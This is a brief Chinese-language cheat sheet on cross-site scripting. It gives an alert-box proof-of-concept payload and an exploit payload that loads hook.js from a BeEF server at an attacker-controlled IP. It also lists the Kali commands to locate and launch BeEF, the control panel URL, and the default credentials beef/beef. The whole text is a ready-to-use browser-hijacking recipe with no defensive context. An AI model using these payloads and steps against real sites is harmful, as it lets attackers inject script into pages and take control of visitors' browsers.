XSS跨站脚本攻击,检测与利用方法
poe:<script>alert('XSS')</script>
exp:<script src="http://<beef服务端ip>:3000/hook.js"></script>//攻击者ip
kali下:
find / -name beef-xss //查找beef-xss
cd /usr/share/beef-xss //进入beef-xss路径
./beef //启动beef
浏览器url登陆:<beef服务端ip>:3000/ui/panel
默认用户名:beef 默认密码:beef